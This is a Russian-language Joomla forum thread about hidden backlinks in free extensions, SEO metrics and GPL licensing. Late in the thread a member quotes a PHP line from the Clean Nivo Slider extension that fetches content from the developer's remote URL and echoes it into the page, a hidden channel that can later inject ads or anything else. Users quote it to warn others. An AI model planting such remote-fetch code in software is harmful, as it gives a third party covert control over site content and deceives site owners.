0 Пользователей и 1 Гость просматривают эту тему.
  • 145 Ответов
  • 12048 Просмотров
*

ecolora

  • Завсегдатай
  • 1527
  • 171 / 2
  • творец
Будет ли быстрее красная машинка или зеленая?

Я даже знаю ответ на этот вопрос: чья тень будет быстрее, та машинка и будет быстрее. ;-)
Я рифме друг словесной. Тут
Свой упражняю словоблуд:
Блог Ecolora
*

Sulpher

  • Живу я здесь
  • 2113
  • 401 / 16
  • Шаблоны и расширения Joomla
В SEO уже несколько лет как глубоко насрать на эти ваши ТИЦ и PR.
Клиенту нужны продажи, а значит целевые посетители, и получить их есть только 2 основных метода - реклама и позиции в поисковиках, остальное оставим дорвейщикам и черному SEO.

Voland, если сайт собственный, то наращивание пузомерок весьма имеет значение для той же контексной рекламы.
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Ну вот.... я даже знаю ответ на этот вопрос: чья тень будет быстрее, та машинка и будет быстрее. ;-) Ещё не убедил?
А я не знаю ответ.
Чтобы его узнать мне надо посмотреть на мощность движков, массу, техсостояние, на какую дистанцию ехать, хватит ли бензина.
Так же и в продвижении - есть много факторов, над которым можно и нужно работать, а не голословно утверждать или надеяться быть выше.
Яндекс же не зря говорит - улучшайте сайты и будет профит.
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Voland, если сайт собственный, то наращивание пузомерок весьма имеет значение для той же контексной рекламы.
Для контекстной - почти не имеет, для сапы - да.
Но сапа на сайте клиента - нонсенс ))
*

Efanych

  • Глобальный модератор
  • 4684
  • 644 / 0
  • Меняю свою жизнь на 360°!
Цитировать
Так же и в продвижении - есть много факторов, над которым можно и нужно работать
А при прочих равных будет ли выше в поиске сайт у которого ТИЦ выше?
Создание сайтов, шаблонов, помощь в решении проблем.
*

ecolora

  • Завсегдатай
  • 1527
  • 171 / 2
  • творец
Так же и в продвижении - есть много факторов, над которым можно и нужно работать, а не голословно утверждать или надеяться быть выше.

Полностью согласен.

Про тень - думал поймете, что это аллегория.
Я рифме друг словесной. Тут
Свой упражняю словоблуд:
Блог Ecolora
*

ecolora

  • Завсегдатай
  • 1527
  • 171 / 2
  • творец
А при прочих равных будет ли выше в поиске сайт у которого ТИЦ выше?

На это Вам 100% ответил бы только Яндекс, хотя логично предположить, что выше. Иначе вообще какой смысл в тИЦ? Пузом меряться?
Я рифме друг словесной. Тут
Свой упражняю словоблуд:
Блог Ecolora
*

Efanych

  • Глобальный модератор
  • 4684
  • 644 / 0
  • Меняю свою жизнь на 360°!
На это Вам 100% ответил бы только Яндекс, хотя логично предположить, что выше. Иначе вообще какой смысл в тИЦ? Пузом меряться?
Ну да, я так и хотел спросить - обязательно ли он будет выше?
Создание сайтов, шаблонов, помощь в решении проблем.
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
А при прочих равных будет ли выше в поиске сайт у которого ТИЦ выше?
Прочие абсолютно равными не бывают.
Если у сайтов разный ТИЦ, то как минимум разная ссылочная масса.
Возможно что у сайта с ТИЦ 100 95% ссылочной массы поднимает ТИЦ, но мусорно влияет на позиции, тогда он будет ниже.
Хотя при одинаковой структуре ссылочной - да будет выше, но это опять же теория.
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
На это Вам 100% ответил бы только Яндекс, хотя логично предположить, что выше. Иначе вообще какой смысл в тИЦ? Пузом меряться?
Ага, меряться пузом и быть выше в ЯКе. Всё.
Для своих сайтов - дороже продавать ссылки в сапе еще.
*

ecolora

  • Завсегдатай
  • 1527
  • 171 / 2
  • творец
Я ухожу из темы... то бишь отписываюсь... у меня запуск своего нового сайта всё откладывается... полдня убил на, походу, ненужные споры. :-) А еще есть существующие проекты. Прошу простить, коллеги. Если есть вопросы, предложения, пожелания - пишите в личку или по контактам... мне моим. :-))

Завтра будет новый день и новая пища.

В Красноярске уже почти 21:00 Military time (как говорят Американцы).
Я рифме друг словесной. Тут
Свой упражняю словоблуд:
Блог Ecolora
*

poiuy

  • Захожу иногда
  • 203
  • 30 / 6
  • o_O
Блин, пока на работе был, весь ажиотаж прошел. Все, что хотел привести в качестве аргументов - уже сказано.

Что бы ни кого лично не "цеплять", вопрос всем:

Если не было бы ссылки, и не было бы необходимости "платить за бесплатность"(чушь какая-то), вы бы перевели на счет разработчика деньги?
Или благодарность в вас пробуждается только при виде ссылки?
С ссылкой - разработчик тоже кушать хочет.
Без ссылки - разработчик сыт (не голоден ^_^) и пробьется и без вашей помощи, так получается?

Кроме того, я как уже писал выше, скрытая ссылка - не хорошо. Почему - уже озвучили, сам хотел о том же, но время перед работой не было. Спасибо дамам.

Видел расширение, не помню название - но весьма распространенное, так в нем в админке есть запись - "Понравилось? Можешь нас отблагодарить деньгами таким то способом".
В чем проблема? Все честно.

ps/ Не знаю что за расширение обсуждается, но как я понял - забугорное. Так вот, для справки, это только в рунете вебмастера помешаны на тицах и пиарах, за границей немного все не так. Яндекс нет, а гоша и без этой ссылки разберется, как ему отранжировать сайт SEO firm'ы. Поверьте моему более чем скромному опыту.
« Последнее редактирование: 29.08.2012, 17:09:22 от poiuy »
*

flyingspook

  • Живу я здесь
  • 3590
  • 247 / 9
блаблаблабла
кто в лес кто по дрова, все по вершкам как понимаю плавают, и тему помойка, еще правда персонажей не хватает кто хоть что то сказать может но промолчит, а если скажет то тоже что и пишут, не кто не расскажет своих наработок и знаниями не поделится, ecolora в последних постах прав на 100%, людям говорят то что они хотят(должны) слышать, остальное опыт, тут много не затронули и не надо, а кричать что читать надо в Яндекс и гугле это бред, покажите хоть одну работу сделанную по их описанию и чтоб она была в топ3 по запросу 1млн-5млн/месяц, и с тиц у неё все было в порядке и pr должный, не покажите, так что не стучите себя в грудь как кин-конг

мне сегодня алгоритм раскроют?

ЗЫ. только ссылаться не на кого не надо, а то пророки видят и не говорят
*

poiuy

  • Захожу иногда
  • 203
  • 30 / 6
  • o_O
Абсолютно верно, кто в лес, кто по дрова....

Суть вопроса в скрытой ссылке, на сайт не относящийся напрямую к распространяемому расширению.

Конечно, ecolora прав. Да все правы, даже вы, как я уже отметил.

И не надо оправдывать разработчика "расширение с ссылкой -2, без ссылки- 5". Не теряйте нить разговора.

Я люблю откушать в ресторанчике недалеко от дома, там дико вкусный борщ готовят. Но если мне его принесут и швырнут на стол со словами "жри скатина", я безусловно буду вкушать борщик в заведении напротив. Пусть не такой наваристый, зато с удовольствием. Извините, конечно, за идиотскую аналогию, просто хотелось бы корень проблемы обнажить.

Ну а насчет яндекса и гугола - тут ни вам, ни нам, ни кому ни кто не скажет ничего, ибо 80% информации - это мифы, слухи и ввыводы, сделанные сеошниками на основе своего опыта. Опыта, надо подчеркнуть, набранного на одном-двух сайтах. Ну не сработает одна схема на всех сайтах. Или я зря получаю свои деньги.
*

Marques

  • Завсегдатай
  • 1410
  • 190 / 9
  • Ctrl+F5
Господа, а о чем спор-то ?
Вы наименование лицензии указанной в JED видели ? (License GPLv2)
О чем спор ?
Читаем лицензию, делаем все в соответствии с ней и все будет по закону.

Я что-то упустил ? Скрытые ссылки... какой-то произвол ? Ответ - http://www.gnu.org/licenses/gpl-2.0.html
Зануда перфекционист, не признающий авторитетов, ищет легкую работу за большие деньги - http://dtkp.ru/ s@dtkp.ru
*

dmtn

  • Захожу иногда
  • 379
  • 25 / 2
Тема изрядно старовата, но оказывается актуальна по сей день.
На днях столкнулся именно с подобной ситуацией, поэтому пишу, на всякий случай, чтобы другие не напоролись

Взял слайдер на JED - Clean Nivo Slider поставил на сайт на локалке, все хорошо, работает отлично. Через некоторое время (может неделя - не обращал внимания) смотрю, а под слайдером ссылка вылезла вот такая:
Chicago Web Design By: stectech.com/chicago-web-design
на том сайте ни слова про этот слайдер, текстовый поиск по файлам слайдера вообще ничего не дал.
 
А у того, кто на JED обозначился разработчиком ни слова о возможности купить, лицензия GPLv2 и исключительно положительные отзывы. Т.е качай да пользуйся всем функционалом и никаких "хочет кушать"

Полностью страничка с расширениями этого разработчика здесь
http://extensions.joomla.org/profile/profile/details/283229

Сам разработчик тут вывесился
http://extensions.4joomla.org/

такие дела
*

robert

  • Живу я здесь
  • 4974
  • 457 / 20
Да, действительно нехорошо. Добавили эту фигню
Код: php-brief
$credit=file_get_contents('http://4joomla.org/extensions/Clean_FB/credits/дата_скачивания.php');echo $credit;
В течение какого-то времени он пустой, но потом туда могут впихать что хотят. Напишите жалобу на них.
Не будь паразитом, сделай что-нибудь самостоятельно!
*

dmtn

  • Захожу иногда
  • 379
  • 25 / 2
на JED на английском пишут, а я в нем вообще никак
*

dmtn

  • Захожу иногда
  • 379
  • 25 / 2
там уже кто-то отметился на эту же тему до меня
« Последнее редактирование: 26.08.2015, 12:15:42 от dmtn »
*

SmokerMan

  • Гуру
  • 5293
  • 720 / 26
JED - это рекламная площадка
как в таких случаях часто бывает, вас могут часто опрокинуть
т.е. они не отвечают за продукт и исполнитель так же не отвечает за продукт.
Пример - я сегодня им показал рабочее расширение, они утвердили, завтра я вместе с этим расширением распространяю шэл :)
*

dmtn

  • Захожу иногда
  • 379
  • 25 / 2
JED
Пример - я сегодня им показал рабочее расширение, они утвердили, завтра я вместе с этим расширением распространяю шэл :)
выходит вообще ничему доверять нельзя и сам разработчик у себя на сайте может распространять такую ерунду
какой выход? покупка? вот мой пример - никто покупку и не предлагает а просто раздает дыры под лицензией gpl
*

flyingspook

  • Живу я здесь
  • 3590
  • 247 / 9
*

dmtn

  • Захожу иногда
  • 379
  • 25 / 2
да-да, пойди найди затерянный трижды зашифрованный код:
.ончил ьтяреворп есВ
))))
*

flyingspook

  • Живу я здесь
  • 3590
  • 247 / 9
да-да, пойди найди затерянный трижды зашифрованный код:))))
Его видно практически сразу если просматривать код расширений, на практике используется очень мало дополнительных расширений узкоспециализированный набор. Он всегда проверен и подпиливается под нужды.
*

dmtn

  • Захожу иногда
  • 379
  • 25 / 2
да полностью согласен, вот только php дочитаю, уж не говорю "выучу" )))
*

ChaosHead

  • Гуру
  • 5241
  • 451 / 13
Точно так-же в wp ставил из каталога дополнение для редиректов, оказалось содержит мобильный редирект. Так что JED не один такой.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Выбираем лучшие расширения для Joomla 2020

Автор zikkuratvk

Ответов: 17
Просмотров: 1236
Последний ответ 20.03.2020, 11:35:12
от zikkuratvk
Ищу напарника для покупки подписки на расширения

Автор FitMe

Ответов: 7
Просмотров: 1082
Последний ответ 12.08.2016, 19:35:58
от Septdir
Не совсем понятно!

Автор infinityspace

Ответов: 26
Просмотров: 1238
Последний ответ 07.02.2016, 13:51:06
от Sulpher
2 расширения для сайта тур агентства

Автор nika-odessa

Ответов: 19
Просмотров: 1571
Последний ответ 29.09.2014, 22:14:26
от nika-odessa
Что-то совсем скучным флейм стал, давайте немного отвлечемся друзья ;)

Автор Marques

Ответов: 9
Просмотров: 1583
Последний ответ 15.08.2014, 23:34:37
от Plazmodina